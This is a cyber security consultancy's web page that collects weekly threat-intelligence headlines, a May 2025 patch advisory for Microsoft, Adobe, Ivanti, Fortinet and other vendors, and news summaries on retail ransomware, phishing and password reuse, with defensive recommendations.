Social Media
Well, Well, Well: Meta to Add Facial Recognition To Glasses After All
Fake AI Tools Used to Spread Noodlophile Malware, Targeting 62,000+ via Facebook Lures
noyb sends Meta C&D demanding no EU user data AI training • The Register
Regulations, Fines and Legislation
Google Pays $1.375 Billion to Texas Over Unauthorized Tracking and Biometric Data Collection
Why we must reform the Computer Misuse Act: A cyber pro speaks out | Computer Weekly
EU extends cyber sanctions regime amid rising digital threats - EU Reporter
UK Government Publishes New Software and Cyber Security Codes of Practice
NCSC assures CISA relationship unchanged post-Trump • The Register
DHS won’t tell Congress how many people it’s cut from CISA | CyberScoop
10 Reasons Why America Needs a Cyber Force
New cyber security law updates may be on the way
President Trump's Qatari 747 is a flying security disaster • The Register
CISA Reverses Decision on Cyber Security Advisory Changes - Infosecurity Magazine
Update to How CISA Shares Cyber-Related Alerts and Notifications | CISA
US Army Deactivates Only Active-Duty Information Operations Command
What Does EU's Bug Database Mean for Vulnerability Tracking?
CVE funding crisis offers chance for vulnerability remediation rethink | CSO Online
Models, Frameworks and Standards
UN Launches New Cyber-Attack Assessment Framework - Infosecurity Magazine
UK Government Publishes New Software and Cyber Security Codes of Practice
New Cyber Security Certification for Defence Announced
NCSC and industry at odds over how to tackle shoddy software • The Register
Data Protection
noyb sends Meta C&D demanding no EU user data AI training • The Register
Careers, Working in Cyber and Information Security
Most businesses can't fill cyber roles leaving huge gaps in defense | TechRadar
Cyber Forensic Expert in 2,000+ Cases Faces FBI Probe – Krebs on Security
EU Launches Free Entry-Level Cyber Training Program - Infosecurity Magazine
Infosec Layoffs Aren't the Bargain Boards May Think
Law Enforcement Action and Take Downs
Police dismantles botnet selling hacked routers as residential proxies
Germany Shuts Down eXch Over $1.9B Laundering, Seizes €34M in Crypto and 8TB of Data
European Police Bust €3m Investment Fraud Ring - Infosecurity Magazine
Kosovo authorities extradited admin of the cybercrime marketplace BlackDB.cc
Moldovan Police Arrest Suspect in €4.5M Ransomware Attack on Dutch Research Agency
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Locked Shields 2025 Showcased Nations' Commitment to Defending Cyberspace
Nation State Actors
CyberUK 2025: Resilience and APT Threats Loom Large
China
Chinese hackers behind attacks targeting SAP NetWeaver servers
Can Cybersecurity Keep Up With the AI Arms Race?
Locked Shields 2025 Showcased Nations' Commitment to Defending Cyberspace
‘Rogue’ devices found in Chinese solar inverters - PV Tech
Ghost in the machine? Rogue communication devices found in Chinese inverters | Reuters
Russia
Downing St updating secret contingencies for Russia cyberattack, report claims – PublicTechnology
Fancy Bear campaign sought emails of high-level Ukrainians and their military suppliers | CyberScoop
Andrei Tarasov: Inside the Journey of a Russian Hacker on the FBI’s Most Wanted List - SecurityWeek
North Korea
North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop
North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED
North Korea ramps up cyberspying in Ukraine to assess war risk
Tools and Controls
CyberUK 2025: Resilience and APT Threats Loom Large
Majority of Browser Extensions Pose Critical Security Risk, A New Report Reveals
DMARC’s Future: Ignoring Email Authentication is No Longer an Option - Security Boulevard
73% of CISOs admit security incidents due to unknown or unmanaged assets | CSO Online
Layoffs pose a cybersecurity risk: Here's why offboarding matters - Help Net Security
The browser blind spot: Hidden security risks behind employee web activity - Digital Journal
UK Government Publishes New Software and Cyber Security Codes of Practice
When the Perimeter Fails: Microsegmentation as the Last Line of Defense - Security Boulevard
Cyber cover needs to be a board conversation business chiefs warned
CIOs paying too much for not enough IT security - survey - TechCentral.ie
New UK Security Guidelines Aims to Reshape Software Development
NCSC and industry at odds over how to tackle shoddy software • The Register
Locked Shields 2025 Showcased Nations' Commitment to Defending Cyberspace
Government webmail hacked via XSS bugs in global spy campaign
88% of Executives Had Home Floor Plans Available Online | Security Magazine
Why Red Teaming belongs on the C-suite agenda | TechRadar
Pen Testing for Compliance Only? It's Time to Change Your Approach
Tackling threats and managing budgets in an age of AI - Tech Monitor
Building Effective Security Programs Requires Strategy, Patience, and Clear Vision
Other News
A third of enterprises have been breached despite increased cybersecurity investment | TechRadar
Unsophisticated Hackers A Critical Threat, US Government Warns
Will cyber criminals come for accountants next? | AccountingWEB
Critical Infrastructure Siege: OT Security Still Lags
UK report uncovers serious security flaws in business IoT devices
Italy’s G7 drive for unified cyber resilience - Decode39
UK Government cyber 'battlements are crumbling' | Professional Security Magazine
Bluetooth 6.1 released, enhances privacy and power efficiency - Help Net Security
Spain to vet power plants’ cyber security for ‘great blackout’ cause | CSO Online
Departments have underestimated threat posed by cyber attacks, MPs warn
TikTok vs defence: Europe faces a reckoning over the allocation of energy
EU power grid needs trillion-dollar upgrade to avert Spain-style blackouts | Reuters
Students to be offered cyber crime protection training | The Herald
The Vatican’s cyber crusaders – POLITICO
Southwest Airlines CISO on tackling cyber risks in the aviation industry - Help Net Security
Vulnerability Management
SonicWall customers confront resurgence of actively exploited vulnerabilities | CyberScoop
Beyond Vulnerability Management – Can You CVE What I CVE?
Your old router could be a security threat - here's why and what to do | ZDNET
ISO - Configuration management: Why it’s so important for IT security
Malware landscape dominated by FakeUpdates | SC Media
DHS won’t tell Congress how many people it’s cut from CISA | CyberScoop
CISA Reverses Decision on Cybersecurity Advisory Changes - Infosecurity Magazine
EU launches own vulnerability database in wake of CVE funding issues | Cybernews
Why CVSS is failing us and what we can do about it • The Register
New Linux Vulnerabilities Surge 967% in a Year - Infosecurity Magazine
CVE funding crisis offers chance for vulnerability remediation rethink | CSO Online
EU bug database fully operational as US slashes infosec • The Register
CVE funding crisis offers chance for vulnerability remediation rethink | CSO Online
Vulnerabilities
Microsoft Fixes 78 Flaws, 5 Zero-Days Exploited; CVSS 10 Bug Impacts Azure DevOps Server
SonicWall Under Pressure as Security Flaws Resurface | MSSP Alert
Your old router could be a security threat - here's why and what to do | ZDNET
Adobe Patches Big Batch of Critical-Severity Software Flaws - SecurityWeek
Fortinet Patches CVE-2025-32756 Zero-Day RCE Flaw Exploited in FortiVoice Systems
Critical Vulnerabilities in Mitel SIP Phones Let Attackers Inject Malicious Commands
Apple Patches Major Security Flaws in iOS, macOS Platforms - SecurityWeek
Compromised SAP NetWeaver instances are ushering in opportunistic threat actors - Help Net Security
Broadcom urges patching VMware Tools vulnerability | Cybernews
Ivanti warns of critical Neurons for ITSM auth bypass flaw
Ivanti Patches Two EPMM Zero-Days Exploited to Hack Customers - SecurityWeek
BianLian and RansomExx Exploit SAP NetWeaver Flaw to Deploy PipeMagic Trojan
New Chrome Vulnerability Enables Cross-Origin Data Leak via Loader Referrer Policy
New Linux Vulnerabilities Surge 967% in a Year - Infosecurity Magazine
SAP cyberattack widens, drawing Salt Typhoon and Volt Typhoon comparisons | CyberScoop
Critical SAP NetWeaver Vuln Faces Barrage of Cyber Attacks
SAP patches second zero-day flaw exploited in recent attacks
Commvault Command Center patch incomplete: researcher • The Register
Chipmaker Patch Tuesday: Intel, AMD, Arm Respond to New CPU Attacks - SecurityWeek
CISA Warns of TeleMessage Vuln Despite Low CVSS Score
Flaw in Asus DriverHub makes utility vulnerable to remote code execution | Tom's Hardware
Samsung Patches CVE-2025-4632 Used to Deploy Mirai Botnet via MagicINFO 9 Exploit
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Advisory 15 May 2025 – Microsoft, Adobe, Ivanti, Fortinet, ASUS, Apple, Broadcom, Juniper and Zoom Security Updates
Black Arrow Cyber Advisory 15 May 2025 – Microsoft, Adobe, Ivanti, Fortinet, ASUS, Apple, Broadcom, Juniper and Zoom Security Updates
Executive Summary
Microsoft's Patch Tuesday for May 2025 addressed 72 vulnerabilities across its product line, including five actively exploited zero-day vulnerabilities. Notably, critical remote code execution flaws were patched in Microsoft Office, Azure DevOps Server, and the Windows Common Log File System Driver.
Adobe released security updates to address 40 vulnerabilities across several products, including critical issues in Adobe Photoshop, Illustrator, and Bridge. These flaws could lead to arbitrary code execution if exploited.
*Updated to clarify that the two vulnerabilities, CVE-2025-4427 and CVE-2025-4428 relating to Ivanti Endpoint Manager (EPMM) are associated with open-source libraries utilised by EPMM.
Ivanti disclosed multiple vulnerabilities affecting several of its products, including a critical authentication bypass in Ivanti Neurons for ITSM (on-premises). A remote code execution vulnerability, and an authentication bypass vulnerability relating to two open-source libraries that are integrated into Ivanti Endpoint Manager Mobile (EPMM) were also disclosed. Ivanti has reported that the EPMM related vulnerabilities have been exploited in the wild, emphasising the importance of applying the latest patches that address these vulnerabilities to secure affected systems.
Fortinet addressed several vulnerabilities across its product suite, notably patching a zero-day remote code execution flaw (CVE-2025-32756) in FortiVoice systems that was actively exploited. Additional critical updates were released for FortiOS and FortiProxy. Administrators should prioritise these updates to protect against potential exploits.
ASUS issued patches for two critical vulnerabilities (CVE-2025-3462 and CVE-2025-3463) in its DriverHub utility. These flaws could allow attackers to execute arbitrary code via crafted HTTP requests or malicious .ini files. Users of ASUS DriverHub should update to the latest version to mitigate these risks.
Apple released comprehensive security updates across its platforms, addressing several vulnerabilities in iOS, iPadOS, macOS, watchOS, tvOS, and visionOS.
Broadcom released a security update for VMware Tools, addressing an insecure file handling vulnerability (CVE-2025-22247). This flaw could allow a malicious actor with non-administrative privileges on Windows and Linux guest VM to tamper with local files, potentially leading to unauthorised behaviours within the virtual environment.
Juniper announced fixes for nearly 90 bugs in third-party dependencies in Secure Analytics, the virtual appliance that collects security events from network devices, endpoints, and applications.
Zoom released seven advisories for nine security defects in Zoom Workplace Apps across desktop and mobile platforms. The most severe of the issues is CVE-2025-30663 (CVSS 8.8), a high-severity time-of-check time-of-use race condition that could allow a local, authenticated attacker to elevate their privileges.
What’s the risk to me or my business?
The actively exploited vulnerabilities across these platforms could allow attackers to compromise the confidentiality, integrity, and availability of affected systems and data. Unpatched systems are at heightened risk of exploitation, leading to potential data breaches, system disruptions, and unauthorised access.
What can I do?
Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.
Microsoft
Further details on specific updates within this Microsoft patch Tuesday can be found here:
https://msrc.microsoft.com/update-guide/releaseNote/2025-May
Adobe, Ivanti, Fortinet, ASUS, Apple, Broadcom, Juniper and Zoom
Further details of the vulnerabilities in affected Apple, Adobe, Fortinet and SAP:
https://helpx.adobe.com/security/security-bulletin.html
https://fortiguard.fortinet.com/psirt
https://www.asus.com/content/asus-product-security-advisory/
https://support.apple.com/en-us/100100
https://www.zoom.com/en/trust/security-bulletin/
#threatadvisory #threatintelligence #cybersecurity
Black Arrow Cyber Threat Intelligence Briefing 09 May 2025
Black Arrow Cyber Threat Intelligence Briefing 09 May 2025:
-Email-Based Attacks Top Cyber Insurance Claims
-Hackers Pose as Staff in UK Retail Cyber Strikes
-High Profile UK Cyber Attacks Underscore the Case for Resilience over Reactivity
-Cyber Attacks Are Costing UK Firms Billions Every Year: Ransom Payments, Staff Overtime, and Lost Business Are Crippling Victims
-Don’t Plug Phones into Chinese Electric Cars, Defence Firms Warn
-94% of Leaked Passwords Are Not Unique
-Personal Data of Top Executives Easily Found Online
-The SMB Cyber Security Gap: High Awareness, Low Readiness
-How Cyber Criminals Exploit Psychological Triggers in Social Engineering Attacks
-Darcula Phishing as a Service Operation Snares 800,000+ Victims
-Cyber Criminals Hold Britain’s Boardrooms to Ransom
-UK at Risk of Russian Cyber and Physical Attacks as Ukraine Seeks Peace Deal
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
Our review of threat intelligence this week reports that business email compromise and funds transfer fraud now account for 60% of cyber insurance claims, and that social engineering now accounts for the majority of cyber threats faced by individuals. Attackers continue to exploit human factors, for example posing as staff to manipulate help desks to grant access to systems as seen in the recent wave of cyber attacks in the UK retail sector. These incidents reinforce the critical importance of layered identity verification, rigorous staff awareness and crisis planning across all sectors.
The growing scale and cost of cyber attacks, now exceeding £64 billion annually for UK firms, highlights a pressing need for resilience over reactivity as a high percentage of affected companies enter insolvency proceedings or file for bankruptcy. Ransomware, social engineering, and password reuse result in operational and reputational harm. Organisations need dedicated cyber leadership, and to avoid a compliance-led approach. Proactive governance and stronger board accountability must become standard practice.
From boardroom data exposure to state-sponsored espionage risks linked to Chinese electric vehicles, the threat landscape is increasingly complex. We continue to warn that both SMEs and large enterprises face escalating risks from persistent attackers, many leveraging phishing-as-a-service platforms or exploiting geopolitical tensions. Now more than ever, cyber security must be embedded in leadership thinking, supply chain oversight, and incident readiness.
Top Cyber Stories of the Last Week
Email-Based Attacks Top Cyber Insurance Claims
Coalition’s 2025 Cyber Claims Report found that business email compromise and funds transfer fraud (FTF) made up 60% of all claims in 2024, with BEC incidents alone averaging $35,000 per event. While ransomware losses were far higher at $292,000 on average, their severity dropped by 7%. Email-based attacks remain the most persistent risk, with nearly a third of BEC incidents also leading to FTF.
Hackers Pose as Staff in UK Retail Cyber Strikes
The UK’s National Cyber Security Centre (NCSC) has issued a critical alert following a wave of cyber attacks targeting major retailers, including M&S, Co-op and Harrods. Criminals posed as IT staff or locked-out employees to manipulate help desk staff into resetting passwords, allowing unauthorised access to internal systems. The attackers, identifying as “DragonForce”, claimed responsibility for data breaches and appear to use methods similar to those of other financially motivated threat groups. The NCSC is urging firms to tighten authentication for help desk processes, particularly for senior staff, and to adopt multi-factor checks and identity code words.
High Profile UK Cyber Attacks Underscore the Case for Resilience over Reactivity
The series of recent cyber attacks on major UK retailers highlights the growing complexity and impact of digital threats. Disruption has ranged from payment failures and warehouse shutdowns to reputational damage, underscoring that cyber resilience is now critical to business continuity. Experts stress that traditional, compliance-led approaches are no longer enough; organisations must adopt Zero Trust principles, enforce multi-factor authentication, and monitor third-party access. With techniques such as credential theft and ransomware increasingly used, cyber security must be treated as a board-level issue embedded in governance, operations and crisis planning.
Cyber Attacks Are Costing UK Firms Billions Every Year: Ransom Payments, Staff Overtime, and Lost Business Are Crippling Victims
Cyber attacks are costing UK businesses £64 billion annually, with over half suffering at least one attack in the past year. Phishing, malware, and online banking threats were the most common, and nearly two-thirds cited staff overtime as a major cost. Direct losses totalled £37 billion, with indirect impacts like increased cyber security budgets and lost clients adding over £26 billion more. Alarmingly, 1 in 8 affected firms entered administration. Despite this, 15% of businesses have no cyber security budget, and nearly half manage risks entirely in-house, underscoring the urgent need for proactive investment in cyber resilience.
Don’t Plug Phones into Chinese Electric Cars, Defence Firms Warn
Defence and intelligence firms are warning staff not to connect phones via cable or Bluetooth to Chinese-made electric vehicles due to fears of state-sponsored espionage. The UK Ministry of Defence has already restricted EV access on military sites, citing findings from the Defence Science and Technology Laboratory that EVs may pose national security risks. Defence suppliers including BAE Systems and Rolls-Royce are advising precautions as all connected vehicles potentially expose sensitive data to foreign interception.
94% of Leaked Passwords Are Not Unique
A new study of over 19 billion leaked passwords has found that 94% are reused or duplicated, leaving users highly vulnerable to cyber attacks. Common entries like “123456”, “admin”, and “password” remain prevalent, with over 700 million instances of “1234” alone. Many systems still rely on default credentials, which users often fail to change. Only 6% of passwords were found to be unique and relatively secure. The report highlights the urgent need for organisations to enforce strong password policies, promote the use of password managers and multi-factor authentication, and regularly monitor for credential leaks.
Personal Data of Top Executives Easily Found Online
Incogni has found that over 75% of corporate board members have personal information including home addresses and family links readily available on people search websites. Exposure is highest in consumer staples (84%), industrials (81%), and technology (77%) sectors, with 26% of board members appearing on more than 20 such sites. Notably, exposure is unrelated to company size, affecting firms with revenues both above $50 billion and below $10 billion equally. The report warns that any organisation, regardless of profile, could face reputational or security risks if senior leaders’ private data remains unprotected online.
The SMB Cyber Security Gap: High Awareness, Low Readiness
CrowdStrike’s latest survey reveals that while 90% of small and midsize business (SMB) leaders recognise cyber threats as a business risk, only 42% provide regular cyber security training. Cost remains the top barrier to better protection, with two-thirds citing it as their primary challenge, yet cutting corners often results in ineffective defences. Smaller firms are disproportionately vulnerable, with 75% of micro-businesses admitting a ransomware attack could shut them down. The report urges stronger vendor support and practical guidance to help SMBs close this growing readiness gap.
How Cyber Criminals Exploit Psychological Triggers in Social Engineering Attacks
Avast reports that social engineering now accounts for the majority of cyber threats faced by individuals in 2024. These attacks exploit human psychology using authority, urgency, and familiarity to bypass technical controls, with tactics ranging from phishing and fake system prompts to deepfake video calls. One such attack resulted in the theft of over $25 million from a global firm. Even security experts are being caught out, highlighting the sophistication of these scams. The report underscores the need for strong identity verification, multi-factor authentication, and regular staff training to mitigate the growing risks posed by these increasingly deceptive methods.
Darcula Phishing as a Service Operation Snares 800,000+ Victims
A sophisticated phishing-as-a-service operation known as Darcula has enabled cyber criminals to compromise over 880,000 payment cards in just seven months. Targeting mobile users globally through SMS, RCS and iMessage, the operation impersonates trusted brands to deceive victims into submitting sensitive information. Researchers uncovered a toolkit named “Magic Cat” at the core of the operation, designed to support non-technical actors with ready-made templates and real-time data streaming. With an estimated 600 cyber crime groups using the platform, law enforcement agencies across multiple jurisdictions have been alerted to the growing threat.
Cyber Criminals Hold Britain’s Boardrooms to Ransom
Cyber attacks have impacted over half of UK firms with ransomware the most damaging threat. High-profile breaches, such as the one affecting M&S, highlight how attacks can cripple operations for weeks and damage share value: M&S alone saw a billion wiped from its market cap. Experts warn that hybrid working, third-party suppliers, and boardroom inexperience are compounding risks, as only 26% of company boards now include a director with cyber responsibility. Despite rising adoption of cyber insurance, it is no substitute for robust cyber security controls.
UK at Risk of Russian Cyber and Physical Attacks as Ukraine Seeks Peace Deal
The UK faces an increasing threat from Russian cyber and physical sabotage as Ukraine moves closer to a peace deal, according to the head of the National Cyber Security Centre. Over 200 cyber incidents have been managed since September 2024, with twice as many nationally significant cases compared to the previous year. Russian intelligence is reportedly using criminal proxies to carry out sabotage, while Iranian, North Korean, and Chinese actors also pose growing risks. The UK government warns that hostile states are using cyber attacks to pursue strategic objectives, often operating in the “grey zone” with plausible deniability.
Sources:
https://www.darkreading.com/cyber-risk/email-based-attacks-cyber-insurance-claims
https://www.scworld.com/brief/hackers-pose-as-it-staff-in-uk-retail-cyber-strikes
https://www.itpro.com/security/cyber-attacks/cyber-attacks-cost-uk-firms-64-billion-each-year
https://www.helpnetsecurity.com/2025/05/07/corporate-directors-personal-information-online/
https://www.msspalert.com/news/the-smb-cybersecurity-gap-high-awareness-low-readiness
https://www.helpnetsecurity.com/2025/05/06/social-engineering-human-behavior/
https://www.infosecurity-magazine.com/news/darcula-phishing-as-a-service/
Governance, Risk and Compliance
UK firms have ‘alarming gaps’ in cyber security readiness | The Standard
UK retail cyber-attacks underscore the case for resilience over reactivity
UK given cyber wake-up call as government looks to act
Government to unveil new cyber security measures after wave of attacks | The Standard
Are You Too Reliant on Third-Party Vendors for Cyber Security? - Security Boulevard
Personal data of top executives easily found online - Help Net Security
The SMB Cyber Security Gap: High Awareness, Low Readiness | MSSP Alert
Building a resilient mindset | The Independent
Cyber resilience is the strategy: Why business and security must align now | SC Media
How CISOs can talk cyber security so it makes sense to executives - Help Net Security
CIOs pay too much for not enough IT security | CIO Dive
CISO vs CFO: why are the conversations difficult? | CSO Online
CISOs Transform Into Business-Critical Digital Risk Leaders
Global cyber security readiness remains critically low - Help Net Security
81% of High-Uncertainty Middle-Market Firms Delay Tech Initiatives
Threats
Ransomware, Extortion and Destructive Attacks
UK businesses lost £64bn to cyber-attacks over a three-year period - UKTN
Don't pay hackers: Cyber Security chief's warning after major retail attacks | ITV News
Cyber Attacks on Critical Infrastructures Makes Us Very Vulnerable - Security Boulevard
Why Ransomware Isn’t Just a Technology Problem (It’s Worse) - Security Boulevard
Ransomware spike exposes cracks in cloud security - Help Net Security
Have Cyber Insurance? The Preferred Victims Of Ransomware Attackers - Above the Law
New "Bring Your Own Installer" EDR bypass used in ransomware attack
Play ransomware exploited Windows logging flaw in zero-day attacks
Govt to inject £16m into retail cyber security
LockBit ransomware gang hacked, victim negotiations exposed
Qilin Has Emerged as The Top Ransomware Group in April with 74 Cyber Attacks
Ransomware Attackers Leveraged Privilege Escalation Zero-day | Symantec Enterprise Blogs
Coalition 2025 Cyber Claims Report Finds Ransomware Stabilized but Remains Costly for Businesses
Ukrainian Nefilim Ransomware Affiliate Extradited to US - SecurityWeek
US Charges Yemeni Hacker Behind Black Kingdom Ransomware Targeting 1,500 Systems
Kickidler employee monitoring software abused in ransomware attacks
470 Ransomware Attacking in 2025, Qilin Remains Dominant Followed by Silent & Crypto24
Ransomware Victims
Despite Arrests, Scattered Spider Continues Hacking
Britain to warn companies cyber security must be 'absolute priority' - The Economic Times
Cyber criminals hold Britain's boardrooms to ransom | This is Money
M&S hackers tricked IT help desk workers to access company systems, says report | The Independent
Inside DragonForce, the Group Tied to M&S, Co-op and Harrods Hacks - Infosecurity Magazine
Co-op cyber attack: supermarket cuts off store deliveries amid food shortage fears
UK retailers under attack: why hackers hit household names
Why Are So Many UK Supermarkets Getting Hacked? | HuffPost UK Life
IT warning after hackers close 160-year-old firm in Kettering - BBC News
Banking Customer Data Exposed Following Ransomware Attack on Vendor | MSSP Alert
Co-op left with empty shelves as it battles cyber attack
Marks & Spencer losses hit £1bn in wake of devastating cyber attacks | This is Money
Rhysida Ransomware gang claims the hack of the Government of Peru
West Lothian schools hit by ransomware cyber attack - BBC News
Lessons Learned from the Blackbaud Hack and Legal Fallout
German drinks group Oettinger confirms cyber attack - Just Drinks
After Hacking 60M Kids for Ransom, PowerSchool Attackers Extort Teachers
TDSB says it got ransom demand over stolen student data not destroyed in cyber security incident
Masimo Manufacturing Facilities Hit by Cyber Attack - SecurityWeek
Phishing & Email Based Attacks
Gen AI is great at phishing, pig butchering scams • The Register
'Venom Spider' Targets Hiring Managers in Phishing Scheme
Beyond the hook: How phishing is evolving in the world of AI | Computer Weekly
Darcula Phishing as a Service Operation Snares 800,000+ Victims - Infosecurity Magazine
Microsoft enforces strict rules for bulk emails on Outlook - gHacks Tech News
Ransomware costs ease but email-based attacks dominate, Coalition reports - Reinsurance News
'CoGUI' Phishing Kit Helps Chinese Hackers Target Japan
Sophisticated Phishing Attack Abuses Discord & Attacked 30,000 Users
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Majority of cyber insurance ransomware claims are due to BEC
Email-Based Attacks Top Cyber Insurance Claims
Other Social Engineering
How cyber criminals exploit psychological triggers in social engineering attacks - Help Net Security
Hackers pose as IT staff in UK retail cyber strikes | SC Media
Marks & Spencer losses hit £1bn in wake of devastating cyber attacks | This is Money
Cyber attack on M&S should be 'wake-up call', minister warns | Politics News | Sky News
Personal data of top executives easily found online - Help Net Security
Darcula PhaaS steals 884,000 credit cards via phishing texts
North Korean hackers show telltale signs, researchers say | SC Media
The many variants of the ClickFix social engineering tactic - Help Net Security
Wave of tech layoffs leads to more job scams - Help Net Security
How to spot and expose fraudulent North Korean IT workers | TechTarget
Crypto scammers abuse X ads with spoofed links | Cybernews
Fraud, Scams and Financial Crime
Gen AI is great at phishing, pig butchering scams • The Register
Digital welfare fraud: ALTSRUS syndicate exploits the financially vulnerable - Help Net Security
Darcula PhaaS steals 884,000 credit cards via phishing texts
Wave of tech layoffs leads to more job scams - Help Net Security
Artificial Intelligence
Gen AI is great at phishing, pig butchering scams • The Register
UK Warns of AI-Based Attacks Against Critical Infrastructure
UK critical systems at risk from ‘digital divide’ created by AI threats | Computer Weekly
1 in 3 workers keep AI use a secret - Help Net Security
Beyond the hook: How phishing is evolving in the world of AI | Computer Weekly
Cisco sounds the alarm over AI security threats
Global cyber security readiness remains critically low - Help Net Security
AI vs. AI: Both Friend and Foe in Cyber Security - EE Times
Most CEOs find their C-suite lacks much-needed 'AI-savvy' | ZDNET
2FA/MFA
Nation-State Actors Continue to Exploit Weak Passwords, MFA
Malware
Hackers Using Weaponized PDF To Deliver Remcos RAT Malware on Windows
StealC malware enhanced with stealth upgrades and data theft tools
Golden Chickens Deploy TerraStealerV2 to Steal Browser Credentials and Crypto Wallet Data
Experts shared up-to-date C2 domains and other artifacts related to recent MintsLoader attacks
Researchers Uncover Malware in Fake Discord PyPI Package Downloaded 11,500+ Times
Linux wiper malware hidden in malicious Go modules on GitHub
Activated Magento Backdoor Hits Up to 1,000 Online Stores
Google identifies new malware linked to Russia-based hacking group | Reuters
Macs under threat from thousands of hacked sites spreading malware — how to stay safe | Tom's Guide
The many variants of the ClickFix social engineering tactic - Help Net Security
Chinese Hackers Exploit SAP RCE Flaw CVE-2025-31324, Deploy Golang-Based SuperShell
Supply chain attack hits npm package with 45,000 weekly downloads
Crypto scammers abuse X ads with spoofed links | Cybernews
Your USB Cable Or Device Could Be Hiding Malicious Hardware: Here's How To Stay Safe
Disney Slack hacker was Californian, not Russian: DoJ • The Register
Bots/Botnets
Hackers Exploit Samsung MagicINFO, GeoVision IoT Flaws to Deploy Mirai Botnet
Improperly Patched Samsung MagicINFO Vulnerability Exploited by Botnet - SecurityWeek
Mobile
Apple issues mercenary spyware threat notifications | Security Magazine
Why Android users should care more about monthly security updates
Update ASAP: Google Fixes Android Flaw (CVE-2025-27363) Exploited by Attackers
Google fixes actively exploited FreeType flaw on Android
Google Confirms Android Attack Warnings — Powered By AI
Denial of Service/DoS/DDoS
Europol Take Down DDoS-for-Hire Empire & Arrested 4 Admins
Europol Announces More DDoS Service Takedowns, Arrests - SecurityWeek
Internet of Things – IoT
Don’t plug phones into Chinese electric cars, defence firms say
Hackers Manage To Take Control of Nissan Leaf's Steering Remotely
Hackers Exploit Samsung MagicINFO, GeoVision IoT Flaws to Deploy Mirai Botnet
Please stop exposing your IoT devices on the internet; your smart light might betray you
Data Breaches/Leaks
Dating app Raw exposed users' location data and personal information | TechCrunch
Signal clone used by Trump official stops operations after report it was hacked - Ars Technica
The Signal Clone Mike Waltz Was Caught Using Has Direct Access to User Chats | WIRED
UK Legal Aid Agency investigates cyber security incident
VC firm Insight Partners confirms personal data stolen during January hack | TechCrunch
Education giant Pearson hit by cyber attack exposing customer data
Hegseth bypassed Pentagon security with dirty line
Texas School District Notifies Over 47,000 People of Major Data Breach - Infosecurity Magazine
Organised Crime & Criminal Actors
Despite Arrests, Scattered Spider Continues Hacking
War on cyber crime: why disrupting attacker infrastructure is critical for security
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Golden Chickens Deploy TerraStealerV2 to Steal Browser Credentials and Crypto Wallet Data
Crypto scammers abuse X ads with spoofed links | Cybernews
Insider Risk and Insider Threats
How cyber criminals exploit psychological triggers in social engineering attacks - Help Net Security
North Korean hackers show telltale signs, researchers say | SC Media
How to spot and expose fraudulent North Korean IT workers | TechTarget
The Most Pressing Security Threat to Business is Hidden in Plain Sight - Security Boulevard
Insurance
Email-Based Attacks Top Cyber Insurance Claims
UK Cyber Insurance Claims Second Highest on Record - Infosecurity Magazine
Have Cyber Insurance? The Preferred Victims Of Ransomware Attackers - Above the Law
A guide to cyber liability insurance for a small business
ABA & Cyber Insurance: Essential IT Requirements for Small Law Firms - LexBlog
Supply Chain and Third Parties
Magento supply chain attack compromises hundreds of e-stores
EY Survey Reveals Rising Cyber Threats from Third-Party Supply Chain Risks
Banking Customer Data Exposed Following Ransomware Attack on Vendor | MSSP Alert
Supply chain attack hits npm package with 45,000 weekly downloads
Activated Magento Backdoor Hits Up to 1,000 Online Stores
Cloud/SaaS
Ransomware spike exposes cracks in cloud security - Help Net Security
New Microsoft 365 outage impacts Teams and other services
Outages
New Microsoft 365 outage impacts Teams and other services
Encryption
After Signal controversy, do private conversations online exist anymore? | CyberScoop
WhatsApp provides no cryptographic management for group messages - Ars Technica
Just 5% of Enterprises Have Deployed Quantum-Safe Encryption - Infosecurity Magazine
Linux and Open Source
Security Researchers Warn a Widely Used Open Source Tool Poses a 'Persistent' Risk to the US | WIRED
Linux wiper malware hidden in malicious Go modules on GitHub
DoD announces overhaul of 'outdated' software procurement • The Register
Passwords, Credential Stuffing & Brute Force Attacks
A whopping 94% of leaked passwords are not unique - will you people ever learn? | ZDNET
A review of 19 billion passwords reveals people are still bad at them | Mashable
Third of Online Users Hit by Account Hacks Due to Weak Passwords - Infosecurity Magazine
Nation-State Actors Continue to Exploit Weak Passwords, MFA
Microsoft sets all new accounts passwordless by default
If we don’t take cyber security seriously, maybe AI will | Cybernews
Social Media
Crypto scammers abuse X ads with spoofed links | Cybernews
Ireland's DPC fined TikTok €530M for sending EU user data to China
Trump promises protection for TikTok as sale deadline nears • The Register
TikTok Fined €530 Million Over Chinese Access to EU Data
Regulations, Fines and Legislation
UK firms have ‘alarming gaps’ in cyber security readiness | The Standard
UK given cyber wake-up call as government looks to act
UK Government to unveil new cyber security measures after wave of attacks | The Standard
What NY's New Security Rules Mean for Finance Firms
What a future without CVEs means for cyber defence - Help Net Security
